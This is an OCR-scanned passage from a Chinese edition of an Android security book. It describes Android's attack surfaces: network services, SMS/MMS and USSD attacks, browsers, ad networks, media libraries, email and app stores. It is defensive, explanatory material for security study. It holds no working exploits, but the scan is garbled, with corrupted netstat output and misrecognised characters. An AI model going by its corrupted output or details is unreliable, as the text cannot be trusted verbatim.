击 面 。Android 应 用 是 另 一 个 能 让 网 络 服务 暴露 的 途径 。 一 些 应 用 会 监听 连接 ， 例 如 通过 虚拟 网 络 
计算 (VNC )、 远 程 桌面 (RDP )、 安 全 shell (SSH ) 或 其 他 协议 向 设备 提供 额外 网 络 访问 的 应 用 。 

枚 举 这 一 攻击 面 可 以 用 两 种 方法 。 一 种 方法 是 ， 研 究 者 使 用 端口 扫描 器 (如 Nmap ) 来 探测 
设备 ， 以 查看 是 否 监听 了 哪些 端口 。 使 用 这 一 方法 可 以 同时 测试 设备 与 网 络 配置 , 但 是 如 果 没 有 
发 现 监听 服务 ， 也 不 一 定 意 味 着 服务 并 没有 开放 监听 。 另 一 种 方法 是 ， 研 究 者 可 以 使 用 shell 访 
问 来 枚 举 出 设备 上 的 监听 端口 。 如 下 shell 会 话 片段 显示 了 应 用 这 种 方法 的 一 个 实例 。 

shell@maguro:/ $ netstat -an | grep LISTEN 


tcp6 0 QasrL2 LR LISTEN 
shell@maguro:/ S 





































































































114 第 5 章 理解 Android 的 攻击 面 





netstat 命令 显示 出 /proc/net 目录 中 tcp、tcp6、udp 和 udp6 的 信息 。 输出 结果 显示 端口 1122 
上 开放 了 某 个 服务 ,而 这 正 是 我 们 告诉 SSH Server ( 由 Ice Cold Apps 公司 开发 ) 应 用 在 其 上 启用 
SSH 服务 需 的 端口 。 

当 启 用 Wi-Fi 热点 功能 后 ， 额 外 的 网 络 服务 也 会 出 现 。 以 下 显示 了 当 这 一 功能 激活 后 ， 


netstat 命令 的 输出 结果 。 


shell@maguro:/ $ netstat -an 














Proto Recv-Q Send-Q Local Address Foreign Address State 
tcp 0 0 L270 0 Te53 0 O00 LISTEN 
tcp 0 0 92.51682435 业 393 OQ:030 和 SS LISTEN 
udp 0 D127%0.01353 Ds O00 CLOSE 
udp 0 0 192,168,43.. 1353 O30%0.0:* CLOSE 
udp 0 0 0.0.0.0:67 OW OW Oa CLOSE 


shell@maguro:/ $ 

这 个 例子 的 结果 显示 DNS 服务 器 (TCP 和 UDP 端口 53 ) 和 DHCP 服务 器 (UDP 端口 67 ) 
被 暴露 在 网 络 上 。 部 署 一 个 热点 显著 扩大 了 Android 设备 的 攻击 面 ， 如 果 一 个 Wi-Fi 热点 可 以 被 
不 受信 任 的 用 户 访问 到 ， 那 么 他 们 可 以 达到 这 些 端 点 甚至 更 多 。 








注意 ”零售 设备 经 常会 包含 更 多 功能 ， 同 时 暴露 更 多 的 网 络 服务 。 三 星 的 Kies 和 摩托 罗拉 的 
DLNA 是 其 中 的 两 个 例子 ， 它 们 对 Android 系统 进行 了 OEM 定制 。 























前 面 已 经 提 到 过 ， 由 于 防火 墙 和 NAT 技术 的 使 用 ， 网 络 服务 经 常 是 无 法 达到 的 。 但 是 如 果 
攻击 者 成 为 了 目标 Android 设备 的 网 络 邻居 ,那么 这 些 障 但 就 自然 消除 了 。 此 外 ,还 有 一 些 公开 
方法 可 以 使 用 UPnP 和 NAT-PMP 等 协议 ， 绕 过 NAT 所 提供 的 类 防火 墙 保护 机 制 ， 这 些 协议 可 以 
让 攻击 者 重新 暴露 出 设备 的 网 络 服务 及 其 关联 的 攻击 面 。 


5.3.4 ”移动 技术 


到 目前 为 止 , 我 们 都 在 关注 普遍 存在 于 连 人 因特网 设备 的 攻击 面 。 移 动 设 备 通过 移动 通信 暴 
露 了 其 他 的 远程 攻击 面 ， 包 括 通过 短 消息 服务 ( SMS ) 与 多 媒体 消息 服务 (MMS ) 所 暴露 的 攻 
击 面 。 这 些 类 型 的 消息 以 运营 商 的 移动 网 络 作 为 传输 媒介 ， 从 一 个 节点 发 送 至 另 一 个 节点 。 因 此 
SMS 和 MMS 的 攻击 面 通常 不 需要 网 络 相 邻 ， 也 不 需要 任何 的 用 户 交 互 即 可 达到 。 

使 用 SMS 和 MMS 消息 作为 攻击 向 量 还 可 以 达到 其 他 几 个 攻击 面 。 例 如 ，MMS 消息 中 可 以 
包含 一 些 多 媒体 内 容 。 而 其 他 一 些 协 议 也 实现 在 SMS 协议 之 上 ， 无 线 应 用 协议 ( WAP ) 就 是 这 
样 一 个 例子 。WAP 又 支持 消息 推送 以 及 几 个 其 他 协议 。 推 送 消息 在 未 经 请 求 的 情况 下 发 送 到 设 
备 上 。 一 种 被 实现 为 WAP 推送 消息 的 请 求 类 型 是 服务 装载 ( SL ) 请 求 ， 这 个 请 求 允许 订阅 者 的 
手机 请 求 URL， 有 时 都 无 需 用 户 交 互 。 这 种 途径 作为 一 种 有 效 的 攻击 向 量 ， 能 够 使 客户 端 攻击 
面 转变 为 远程 攻击 面 。 

2012 年 ，Ravi Borgaonkar 在 阿根廷 的 布 宜 诺 斯 艾 利 斯 市 举行 的 EkoParty 上 演示 了 针对 三 星 
Android 设备 的 远程 攻击 。 具 体 而 言 ， 他 使 用 了 SL 消息 来 调用 非 结构 化 补充 服务 数据 ( USSD ) 
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业务 。USSD 业务 是 用 来 允许 运行 商 与 GSM 设备 执行 充值 、 查 看 账户 余额 、 语 音 邮 件 通 知 等 操 
作 的 。 但 当 三 星 设备 接收 到 这 样 一 条 SL 消息 后 ， 它 无 需 用 户 交 互 就 打开 了 默认 浏览 器 。 当 浏览 
器 加 载 后 ， 它 便 处 理 Ravi 准备 的 包含 几 个 tel:// URL 的 页 面 。 这 些 URL 随后 导致 USSD 代码 自 
动 输入 到 电话 拨号 程序 中 。 在 这 时 , 许多 设备 就 在 代码 完全 输入 后 自动 处 理 这 些 代码 。 某 些 设备 
需要 用 户 按 下 发 送 键 , 这 是 正确 的 处 理 方式 。 三星 设 备 中 的 几 个 特别 邪恶 的 USSD 代码 被 用 来 演 
示 了 这 种 攻击 的 严重 性 。 第 一 个 代码 可 以 通过 重复 地 尝试 修改 个 人 解锁 密 钥 ( PUK ) 来 损坏 用 户 
的 SIM 卡 。 在 10 次 失败 后 ，SIM 卡 会 被 永久 性 地 禁用 ， 用 户 只 能 重新 购买 新 卡 。 另 一 个 代码 可 
以 导致 手机 立即 进行 出 厂 重 置 。 这 两 个 操作 都 不 需要 任何 的 用 户 交 互 。 这 个 演示 案例 非常 有 效 地 
说 明了 通过 SMS 及 其 上 层 协 议 进 行 攻击 的 威力 。 
关于 运用 SMS 暴露 攻击 面 的 更 多 内 容 将 在 第 11 章 中 介绍 。 


5.3.5 ”客户 端 攻击 面 


正如 先前 提 过 的 ， 现 今 网 络 的 一 般配 置 屏 蔽 了 许多 传统 的 远程 攻击 面 。 同 时 , 许多 客户 端 应 
用 对 它们 通信 的 服务 器 是 非常 信任 的 。 基 于 这 样 的 事实 , 攻击 者 已 经 很 大 程度 上 将 关注 点 转移 到 
客户 端 软件 攻击 面 中 存在 的 安全 漏洞 。 信 息 安全 从 业者 称 之 为 “客户 端 攻击 面 ”。 

到 达 这 些 攻击 面 , 通常 依赖 于 潜在 目标 发 起 动作 ， 比 如 访问 一 个 网 站 。 然 而 , 一些 攻 击 技术 
可 以 绕 开 这 一 限制 。 路 径 上 的 攻击 者 可 以 在 大 多 数 场 景 中 非常 容易 地 移 除 掉 这 一 限制 ,只 需 把 他 
们 的 攻击 注入 到 正常 流量 中 即 可 。 一 个 案例 是 “水 坑 式 ”攻击 ， 即 先 攻 陷 目 标 经 常 访问 的 网 站 ， 
然后 等 竺 目标 访问 。 

尽管 要 达到 客户 端 攻击 面 并 不 容易 ， 但 是 攻击 者 可 以 将 他 们 的 “瞄准 镜 ” 设 置 得 更 加 精确 。 
举例 来 说 , 使 用 电子 邮件 向 量 的 攻击 经 过 特意 构造 后 可 以 发 送 给 一 个 目标 或 是 一 个 目标 人 群 。 通 
过 源 地 址 检查 或 指纹 识别 , 路 径 上 的 攻击 者 也 可 以 将 攻击 目标 限定 到 他 们 的 意向 群体 。 这 是 客户 
端 攻击 面 攻击 方式 的 一 个 强大 属性 。 

Android 设备 是 主要 用 来 消费 和 展示 数据 的 ， 因 此 它们 只 会 暴露 极 少 的 直接 远程 攻击 面 ， 绝 
大 多 数 的 攻击 面 是 通过 客户 端 应 用 暴露 的 。 事 实 上 , 在 Android 上 的 许多 客户 端 应 用 会 自动 地 代 
表 用 户 发 起 一 些 操作 , 例如 ,电子 邮件 和 社交 网 络 类 客户 端 会 例 行 地 对 服务 器 进行 轮 询 ， 查 看 是 
否 有 新 的 消息 。 当 找到 新 的 消息 条 目 时 ， 它 们 会 处 理 这 些 条 目 ， 并 通知 用 户 有 新 消息 等 待 查看 。 
这 是 另 一 种 客户 端 攻击 面 无 需 用 户 交 互 而 直接 暴露 的 方式 。 本 节 后 续 内 容 将 详细 讨论 Android 客 
户 端 应 用 所 暴露 的 各 种 不 同 攻击 面 。 

1. 浏览 器 攻击 面 

现代 Web 浏览 需 已 经 成 为 功能 最 为 强大 的 客户 端 应 用 代表 ， 它 们 支持 一 大 堆 的 Web 技术 ， 
同时 也 作为 Android 设 备 支 持 其 他 技术 的 一 个 访问 "网关 ”。 支 持 的 万 维 网 技术 从 最 简单 的 HTML， 
到 基于 众多 JavaScriptAPI 创建 的 功能 极其 复杂 和 丰富 的 Web 应 用 。 除 了 泻 染 和 执行 应 用 逻辑 之 
外 , 浏览 器 进程 还 支持 一 些 底层 协议 ,如 HTTP 和 FTP。 所 有 这 些 特性 都 是 由 绝对 数量 惊人 的 后 
台 代 码 实 现 的 ， 而 其 中 每 个 组 件 ( 经常 是 以 第 三 方 项 目的 方式 集成 ) 都 代表 着 它 自己 的 一 个 攻击 
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面 。 本 小 节 后 续 部 分 将 介绍 浏览 器 易 受 攻击 的 各 种 攻击 向 量 与 安全 漏洞 类 型 ， 并 讨论 Android 设 
备 中 普遍 存在 的 浏览 右 引 苟 中 的 攻击 面 。 

针对 Web 浏览 器 的 成 功 攻击 可 以 通过 几 种 方式 实施 ， 其 中 最 为 普遍 的 方式 是 诱导 用 户 访 问 
一 个 在 攻击 者 控制 中 的 URL。 这 种 方式 很 可 能 是 最 为 普遍 的 ， 因 为 它 的 渠道 非常 多 样 化 。 攻 击 
者 可 以 非常 容易 地 通过 电子 邮件 、 社 交 媒 体 、 即 时 消息 或 其 他 途径 来 分 发 URL。 男 一 种 方式 是 
在 意向 目标 用 户 将 要 访问 的 被 攻陷 网 站 中 插入 攻击 代码 , 这 种 类 型 的 攻击 又 被 称 为 “水 坑 ” 或 “路 
过 ”攻击 。 在 特权 位 置 ( 比如 在 路 径 上 ， 或 是 逻辑 网 络 相 邻 ) 的 攻击 者 都 可 以 随意 地 注入 攻击 内 
容 。 这 些 攻击 方式 经 常 被 称 为 中 间 人 (MitM ) 攻击 。 无 论 是 使 用 哪个 向 量 来 达到 浏览 器 ， 底 层 
的 安全 漏洞 类 型 才 是 更 为 重要 的 。 

在 一 个 应 用 中 安全 地 处 理 来 自 多 个 非 信任 源 的 内 容 是 非常 具有 挑战 性 的 。 浏 览 器 试图 通过 域 
名 将 一 个 站 点 的 内 容 与 男 一 站 点 的 内 容 进行 隔离 访问 ,这 一 控制 机 制 带 来 了 儿 种 几乎 全 新 类 型 的 
安全 漏洞 ， 如 跨 站 脚本 (XSS ) 和 跨 站 请 求 伪 造 (CSRF 或 XSRF )。 此 外 ,浏览 器 处 理 并 呈现 来 
自 多 个 不 同 信任 级 别 的 内 容 ， 这 也 众生 了 跨 区 域 (cross-zone ) 攻击 。 例 如 ， 一 个 网 站 不 应 该 从 
目标 计算 机 系统 中 读 取 任意 的 文件 然后 返回 给 攻击 者 , 然而 , 之 前 发 现 的 区 域 提升 攻击 已 经 让 这 
种 攻击 方式 变 为 可 能 。 这 里 所 列 的 绝 不 是 能 够 影响 浏览 器 安全 漏洞 类 型 的 完整 列表 。 对 这 些 安 全 
漏洞 的 详尽 讨论 已 经 远 远 超出 了 本 节 的 范围 。 许 多 书籍 ， 包括 The Tangled Web* 和 The Browser 
Hackers Handbook， 完 全 关注 于 Web 浏览 器 攻击 ， 是 更 深入 探索 这 一 领域 的 推荐 阅读 书籍 。 
直到 Android 4.1 版 本 ， 设 备 出 三 时 都 只 预 装 一 个 浏览 器 一 一 基于 WebKit 内 核 的 Android 浏 
览 器 。 在 2012 年 Nexus7 和 Nexus4 发 布 时 ,谷歌 开始 将 基于 Chromium 内 核 的 Android 版 Chrome 
作为 默认 浏览 器 , 但 同时 也 预 装 了 Android 浏览 器 。 在 最 近 的 原生 Android 版 本 中 ，Chrome 是 呈 
现 给 用 户 的 唯一 浏览 器 。 然 而 传统 的 Android 浏览 器 内 核 仍 然 存在 ， 并 被 第 三 方 应 用 所 使 用 ,我 
们 在 下 一 小 节 中 讨论 这 些 应 用 。 在 Android 4.4 版 本 ,谷歌 已 经 从 使 用 一 个 纯 Webkit 内 核 引 擎 
( libwebcore.so ) 切换 到 基于 Chromium 内 核 引 擎 (libwebviewchromium.so )。 

Android 版 Chrome 与 其 他 两 个 引擎 的 主要 区 别 在 于 ，Android 版 Chrome 通过 Google Play 获 
取 更 新 , 而 Webkit 引 擎 和 Chromium 引擎 则 通过 Android 框架 层 暴露 给 应 用 , 被 集成 到 固件 ROM 
中 ,只 能 通过 固件 升级 进行 更 新 。 这 一 不 利 条 件 使 得 这 两 个 引擎 仍然 暴露 于 一 些 已 公开 披露 的 安 
全 漏洞 ， 而 有 时 持续 的 时 间 会 相当 长 。 这 就 是 在 第 1 章 中 提 到 的 “half day” 安 全 漏洞 风险 。 

对 一 个 特定 浏览 需 引 警 的 攻击 面 进行 枚 举 , 可 以 通过 如 下 几 种 方式 。 每 个 引 敬 支持 的 特性 集 
合 有 着 细微 差别 ， 因 此 暴露 的 攻击 面 也 会 有 些许 差别 。 因 为 几乎 所 有 输入 都 是 不 可 信 的 , 所 以 几 
乎 每 个 浏览 器 特性 都 构成 了 一 个 攻击 面 。 一 个 很 好 的 起 点 是 调查 分 析 标 准 化 文档 中 指定 的 功能 。 
例如 ，HTML 和 SVG 文档 规范 中 讨论 了 多 个 值得 深入 分 析 的 特性 。 那 些 跟 踪 每 个 浏览 器 引擎 中 
实现 了 哪些 特性 的 网 站 ， 对 于 这 个 过 程 是 非常 有 价值 的 。 此 外 ，Android 系统 中 的 默认 浏览 器 引 
擎 是 开源 的 ， 通 过 深入 分 析 引 苟 源码 来 直 捣 浏览 器 攻击 面 的 “兔子 洞 ” 也 是 可 行 的 。 

更 深入 的 攻击 面 存在 于 浏览 器 支持 的 各 种 特性 的 实现 层面 。 遗憾 的 是 , 枚 举 这 些 第 二 层次 的 




















































































































































































































Qz 其 简体 中 文 版 《Web 之 困 : 现代 Web 应 用 安全 指南 》 已 由 机 械 工业 出 版 社 2013 年 出 版 。 一 一 编者 注 
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攻击 面 非 常 消耗 人 力 。 为 了 简化 工作 , 人 研究 者 倾向 于 基于 茶 些 特性 来 进一步 分 类 攻击 面 ， 比 如 某 
些 攻击 面 可 以 在 JavaScript 禁用 后 进行 运用 ， 而 有 些 不 能 。 一 些 功能 ( 如 CSS 和 其 他 技术 ) 以 非 
党 复杂 的 方式 进行 交互 。 男 一 个 很 能 说 明 问 题 的 例子 是 通过 JavaScript 操纵 文档 对 象 模型 
(DOM )。 攻 击 者 提供 的 脚本 可 以 在 加 载 时 或 加 载 后 动态 地 修改 网 页 的 结构 。 总 而 言 之 ,浏览 器 
的 复杂 性 为 探索 其 中 的 攻击 面 留 下 了 充分 的 想象 空间 。 

本 书后 面 几 章 将 详细 介绍 如 何 对 Android 系统 中 的 浏览 器 进行 模糊 测试 (第 6 章 )、 调试 (第 
7 章 ) 和 攻击 利用 (第 8 章 和 第 9 章 )。 

2. Web 驱动 的 移动 应 用 

移动 设备 中 绝 大 多 数 的 应 用 实际 上 只 是 基于 Web 后 端 技 术 的 客户 端 。 在 过 去 , 开发 者 在 TCP 
或 UDP 上 层 创 建 自己 的 协议 ， 让 他 们 的 客户 端 与 服务 器 进行 相互 通信 。 而 现在 ， 随 着 标准 化 协 
议 、 库 和 中 间 件 的 繁荣 发 展 ， 几 乎 所 有 应 用 都 在 使 用 Web 服务 、XML RPC 等 基于 Web 的 技术 。 
如 果 你 的 移动 应 用 可 以 使 用 与 Web 前 端 相同 的 现 有 Web 服务 APL, 为 什么 还 要 自己 开发 协议 呢 ? 
因此 , 大 多 数 针 对 流行 Web 服务 的 移动 应 用 , 如 Zipcar 、Yelp 、Twitter、Dropbox 、Hulu 、Groupon 
和 Kickstarter 等 ， 都 使 用 了 这 种 设计 。 

移动 开发 者 通常 信任 系统 的 另 一 端 是 正常 操作 的 , 也 就 是 说 , 客户 端 和 服务 器 都 认为 对 方 不 
是 恶意 的 。 然 而 遗憾 的 是 , 事实 并 非 如 此 。 虽 然 有 一 些 方法 可 以 用 来 提升 客户 端 和 服务 器 之 间 的 
信任 级 别 , 特别 是 对 抗 路 径 上 的 攻击 者 与 逻辑 相 邻 的 攻击 者 , 但 是 服务 器 永远 不 能 假设 客户 端 是 
完全 可 信 的 。 同 时 ,客户 端 也 永远 不 能 假设 它 所 对 话 的 服务 器 是 合法 的 ,而 是 应 该 进行 完备 的 认 
证 机 制 ， 以 确保 服务 器 确实 是 合法 的 。 

大 多 数 的 此 类 认证 都 会 使 用 SSL 或 TLS， 而 诸如 证 书 锁定 certificate pinning ) 之 类 的 技术 
可 以 进一步 帮助 防御 假冒 CA( 证 书 授权 ) 等 攻击 。 然 而 是 否 恰当 地 利用 这 些 技 术 则 完全 取决 于 
移动 应 用 开发 者 ， 这 使 得 很 多 应 用 并 没有 得 到 充分 的 保护 。 例 如 ，2008 年 来 自 两 所 德国 高 校 的 
一 组 研究 人 员 发 表 了 一 篇 题 为 “Why Eve and Mallory Love Android: An Analysis of Android SSL 
(In)Security ( 为 什么 Eve 和 Mallory 喜欢 Android: 对 Android SSL (不 ) 安全 性 的 分 析 》” 的 论文 。 
这 篇 论文 记录 了 研究 人 员 对 Android 应 用 中 SSL 验证 状态 的 调查 发 现 。 他 们 的 研究 发 现 ，Google 
Play 市 场 上 的 所 有 应 用 中 有 8% 使 用 SSL 库 的 方式 并 不 安全 ,由 于 对 SSL/TLS 证 书 的 验证 不 充分 ， 
这 些 应 用 会 轻易 地 被 中 间 人 攻击 。 

当然 , 每 个 Web 驱动 的 移动 应 用 所 暴露 的 攻击 面 不 尽 相同 。 一 个 特别 危险 的 例子 是 流行 的 
Twitter 客户 端 。Twitter 是 一 个 基于 Web 的 社交 媒体 平台 ,但 有 多 款 Android 应 用 客户 端 。 这 
些 应 用 经 常 使 用 WebView (在 Android 框架 层 中 暴露 的 一 个 构件 ) 来 演 染 富 媒 体内 容 ， 以 包含 
在 推 文 (tweet ) 中 。 例 如， 大 部 分 Twitter 客户 端 会 自动 呈现 (render ) 内 肉 的 图 片 。 这 代表 着 
一 个 显著 的 攻击 面 ， 在 底层 图 像 解析 库 中 的 安全 漏洞 可 能 会 导致 设备 被 攻陷 。 另 外 ，Twitter 
用 户 经 常会 分 享 指向 其 他 有 趣 Web 内 容 的 链接 , 而 点 开 这 些 链接 的 好 奇 用 户 将 会 面临 传统 浏览 
器 攻击 的 威胁 。 此 外 , 许多 Twitter 客户 端 订 阅 了 推送 消息 ( 服务 器 通过 推送 消息 提供 新 数据 )， 
或 者 经 常 轮 询 服 务 器 来 获取 新 数据 。 这 一 设计 ,将 客户 端 应 用 变 成 无 需 任何 用 户 交 互 即 可 被 远 
程 攻 击 的 目标 。 
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3. 广告 网 络 

广告 网 络 是 Android 应 用 生态 圈 中 非常 重要 的 一 环 , 经 常 被 那些 开发 免费 移动 应 用 的 开发 者 
所 使 用 。 在 这 些 应 用 中 , 开发 者 会 添加 另外 的 代码 库 , 在 必要 的 时 候 调用 它们 来 显示 广告 。 在 这 
些 行 为 的 背后 , 应 用 开发 者 有 一 个 广告 账户 , 并 基于 不 同 的 标准 (如 广告 的 显示 次 数 ) 获取 报酬 。 
对 于 特别 流行 的 应 用 ( 如 《愤怒 的 小 鸟 》) 而 言 ， 这 种 模式 的 收益 很 不 错 ， 因 此 被 应 用 开发 者 采 
用 并 不 稀奇 。 

广告 网 络 代表 着 一 个 非常 有 趣 但 又 有 巨大 潜在 风险 的 领地 ,， 有 如 下 几 个 原因 。 用 来 呈现 广告 
的 功能 通常 基于 一 个 纳入 式 浏览 器 引 区 (WebView )， 因 此 传统 的 浏览 器 攻击 对 于 这 些 应 用 都 是 
存在 的 ， 但 一 般 只 能 通过 中 间 人 攻击 向 量 实施 。 与 传统 浏览 器 不 同 ， 这些 WebView 组 件 经 常 暴 
露出 额外 的 攻击 面 ， 这 些 供给 面 可 以 利用 Java 类 型 的 反射 攻击 进行 远程 攻破 。 广 告 网 络 框架 万 
为 可 怕 ， 因 为 合法 广告 商 也 可 能 利用 这 些 弱 点 来 控制 大 量 设备 。 本 书 不 会 介绍 这 种 类 型 的 攻击 ， 
建议 你 通过 搜索 “WebView”“addJavascriptInterface” 和 “Android Ad Networks” 来 仔细 研究 。 

除了 远程 代码 执行 的 风险 , 广告 框架 还 会 对 隐私 构成 显著 威胁 。 许多 广告 框架 已 经 被 发 现 搜集 
过 多 的 个 人 信息 并 报告 给 广告 商 。 这 类 软件 通常 被 归 类 为 广告 软件 (adware )， 是 非常 令 终端 用 户 
讨厌 的 东西 。 例 如 , 一 个 广告 框架 可 能 会 搜集 用 户 通讯 录 中 的 电子 邮件 地 址 , 并 将 它们 卖 给 垃圾 邮 
件 发 送 者 ,之 后 这 些 用 户 就 会 收 到 大 量 不 请 自 来 的 垃圾 邮件 。 尽 管 比 起 对 Android 设备 的 完全 攻陷 
这 并 不 算 太 严 重 , 但 是 也 不 应 忽视 。 有 时 只 需 获 知 用 户 的 位 置 或 通讯 录 ， 攻 击 者 就 是 以 达成 目标 。 

4. 媒体 与 文档 处 理 

Android 包含 了 大 量 非常 流行 并 经 过 仔细 审查 的 开源 程序 库 ， 其 中 许多 是 用 来 处 理 富 媒体 内 
容 的 。libpng 和 libjpeg 等 程序 库 十 分 常用 ， 几 乎 所 有 需要 呈现 PNG 和 JPEG 图 片 的 地 方 都 会 分 别 
用 到 它们 。Android 也 不 例外 。 这 些 程序 库 代 表 着 一 个 显著 的 攻击 面 ,因为 它们 所 处 理 的 非 可 信 数 
据 数量 庞大 。 正如 在 5.3.5 节 第 2 小 节 讨 论 的 , Twitter 客户 端 经 常会 自动 呈现 图 片 。 在 这 种 情况 下 ， 
对 于 这 些 组 件 的 攻击 可 能 会 导致 无 需 用 户 交 互 的 远程 攻破 。 虽 然 这 些 程序 库 经 过 了 仔细 审查 ， 但 
这 并 不 意味 着 它们 没有 安全 漏洞 。 在 过 去 两 年 里 ， 人 们 在 这 两 个 程序 库 中 发 现 过 重大 安全 漏洞 。 

另外 , 一 些 OEM 的 Android 设备 在 出 三 时 会 自 带 文档 阅读 和 编辑 工具 。 例 如 , 在 2012 年 的 
Mobile Pwn2Own 竞赛 中 ， 三 星 Galaxy S3 中 自 带 的 Polaris Office 应 用 被 人 成 功利 用 来 对 设备 进 
行 远程 代码 执行 。 在 这 个 竞赛 中 使 用 的 攻击 向 量 是 近 场 通信 ( NFC )， 这 一 技术 我 们 将 在 5.4.1 节 
第 5 条 中 讨论 。 

5. 电子 邮件 

电子 邮件 客户 端 是 另 一 个 有 着 暴露 攻击 面 的 客户 端 应 用 。 与 前 面 提 到 的 客户 端 应 用 一 样 , 电 
子 邮 件 也 可 以 用 作 发 起 浏览 器 攻击 的 攻击 向 量 。 事实 上 ，Android 的 电子 邮件 客户 端 往 往 基于 一 
个 配置 受 限 的 浏览 器 引擎 ， 具 体 而 言 ， 电 子 邮 件 客 户 端 不 支持 JavaScript 和 其 他 脚本 内 容 。 这 
就 是 说 ,现代 电子 邮件 客户 端 只 会 呈现 一 部 分 富 媒 体内 容 ， 如 标记 语言 和 图 片 等 。 此 外 ， 电 子 邮 
件 消息 也 可 以 包含 附件 ， 而 附件 在 其 他 平台 上 一 直 是 个 麻烦 之 源 。 举 例 来 说 ,这 些 附件 可 以 用 来 
攻击 像 Polaris Office 这 样 的 应 用 。 实 现 这 些 功 能 的 代码 是 未 来 的 一 个 有 趣 的 研究 领域 , 而 且 似 乎 
被 探索 得 相对 较 少 。 
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5.3.6 ”谷歌 的 基础 设施 


Android 设备 尽管 强大 ， 但 很 多 功能 依赖 于 云 服务 。 这 些 云 服 务 后 台 的 基础 设施 中 有 相当 大 
比例 是 由 谷歌 托管 的 。 这 些 服 务 提供 的 功能 ， 从 简单 的 联系 人 同步 、Gmail 电子 邮件 ， 到 复杂 的 
远程 管理 特性 。 这 样 ， 这 些 云 服务 呈现 出 一 个 有 趣 的 攻击 面 ， 虽 然 普通 攻击 者 通常 难以 达到 。 这 
些 服务 中 许多 都 是 通过 谷歌 的 单 点 登录 ( SSO ) 系统 进行 认证 的 ， 而 这 给 滥用 创造 了 可 能 性 ， 
为 从 一 个 应 用 盗 取 的 认证 凭据 可 以 用 来 访问 另 一 个 应 用 。 本 节 将 讨论 几 个 相关 的 后 台 基 础 设施 组 
件 ， 以 及 如 何 使 用 它们 远程 攻破 Android 设备 。 

1. Google Play 商店 

谷歌 发 布 Android 应 用 等 内 容 的 官方 平台 是 Google Play 商店 。 用 户 可 以 在 上 面 购买 音乐 、 

影 、 电 视 节 目 、 图 书 、 杂 志 、 应 用 ， 甚 至 Android 设备 。 绝 大 部 分 内 容 都 可 以 直接 下 载 ， 立 即 
在 选 定 设 备 中 使 用 。2011 年 年 初 ， 谷 歌 开 放 了 一 个 用 来 访问 Goolge Play 商店 的 Web 站 点 。2013 
年 年 底 ， 谷 歌 又 增加 了 一 个 称 为 Android 设备 管理 器 的 远程 设备 管理 组 件 。 作 为 一 个 享有 特权 和 
信任 的 角色 ，Google Play 商店 成 为 攻击 者 考虑 攻击 Android 设备 时 最 关注 的 基础 设施 。 事 实 上 ， 
Google Play 商店 已 被 多 次 攻击 ， 接 下 来 详细 介绍 。 

2. 恶意 应 用 

Google Play 商店 中 的 大 多 数 内 容 来 自 非 信 任 源 ， 这 代表 着 另 一 个 非常 重要 的 远程 攻击 面 。 
也 许 最 好 的 例子 就 是 Android 应 用 。 很 显然 , Android 应 用 中 含有 可 以 直接 在 Android 设备 上 执行 
的 代码 ， 因 此 ， 安 装 一 款 应 用 就 等 同 于 授予 应 用 开发 者 任意 代码 执行 权限 (尽管 是 在 Android 用 
户 层 沙 箱 内 )。 遗憾 的 是 ,对 于 任意 给 定 的 任务 ,可 用 的 应 用 数量 对 于 用 户 而 言 都 是 非常 庞大 的 ， 
这 让 用 户 难 以 确定 是 否 应 该 信任 特定 的 开发 者 。 如果 用 户 对 是 否 可 信和 判断 失误 , 安装 了 一 款 恶 意 
应 用 , 则 可 能 会 导致 设备 完全 沦陷 。 除 了 依靠 用 户 作出 错误 的 信任 决定 ,攻击 者 还 可 以 盗用 开发 
者 的 Google Play 账号 ， 将 其 应 用 替换 为 包含 恶意 代码 的 重 打包 版 本 。 这 个 恶意 应 用 就 可 以 自动 
安装 到 安装 有 安全 版 本 的 设备 上 。 这 是 一 种 强力 的 攻击 ， 如 果实 施 的 话 ， 会 对 Android 生态 圈 造 
成 灾难 性 影响 。 

Google Play 商店 中 的 其 他 内 容 也 可 能 用 来 攻陷 设备 ， 但 这 些 内 容 的 来 源 目 前 还 不 是 完全 清 
楚 。 而 不 了 解 这 一 情况 ， 就 不 可 能 确定 其 中 是 否 存在 值得 调查 的 攻击 面 。 

除了 GooglePlay 商店 的 Web 应 用 之 外 ( 这 不 在 本 章 讨 论 范 围 ),Android 设备 上 的 Google Play 
应 用 也 暴露 了 一 个 攻击 面 。 这 个 应 用 必须 处 理 并 呈现 由 开发 者 提供 的 非 信任 数据 ,例如 , 应 用 撕 
述 就 是 一 个 非 信任 数据 源 。 在 这 一 攻击 面 之 下 的 底层 代码 是 挖掘 安全 漏洞 的 有 趣 位 置 。 

3. 第 三 方 应 用 生态 圈 

谷歌 公司 允许 Android 用 户 在 Google Play 商店 之 外 安装 应 用 。 通 过 这 种 开放 的 方式 , Android 
人 允许 独立 第 三 方 通过 公司 网 站 或 个 人 网 站 分 发 应 用 。 然 而 用 户 必须 首先 显 式 地 授权 才能 安装 第 三 
方 应 用 ， 流 程 如 图 5-3 所 示 。 
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图 5-3 ”授权 未 知 应 用 的 流程 


能 够 在 Android 设备 上 安装 第 三 方 应 用 的 这 一 特点 ， 

















自然 而 然 地 催生 了 第 三 方 应 用 生态 圈 ， 





但 同时 也 带 来 了 一 些 相关 的 风险 。 或 许 第 三 方 应 用 商店 所 带 来 的 最 大 威胁 , 是 从 PC 和 Mac 上 资 
版 或 破解 软件 中 带 过 来 的 特洛伊 木马 。 亚 意 攻 击 者 会 对 一 个 流行 并 可 信任 的 应 用 进行 反 编 译 ， 然 




















后 打包 进去 一 些 恶 意 代码 , 并 发 布 到 第 三 方 应 用 商店 中 。 


























2012 年 由 Arxan 科技 公司 进行 的 一 份 名 





为 “State of Security in the App Economy: “Mobile Apps Under Attack””(“ 应 用 经 济 中 的 安全 性 分 析 : 


‘在 遭受 攻击 的 移动 应 用 '”) 的 研究 报告 显示 ,Google Play 商店 中 排名 前 100 的 Android 付费 应 用 

















全 部 都 被 破解 、 修 改 并 放 到 第 三 方 分 发 站 点 上 供 人 下 载 。 这 份 报告 也 给 出 了 关于 这 些 站 点 流行 程 
度 的 一 些 很 有 价值 的 数据 ， 并 提 到 这 些 站 点 提供 的 一 些 流行 Android 付费 应 用 的 总 下 载 次 数 达到 

















50 万 人 次 。 





在 Android 4.2 中 ,谷歌 公 司 引 入 了 一 个 称 为 “验证 应 用 ”的 特性 。 这 一 特性 通过 使 用 指纹 


识别 和 启发 式 进行 工作 , 从 应 用 中 提取 一 些 启发 式 数 据 ， 











然后 使 用 这 些 数 据 在 谷歌 公司 运营 的 一 











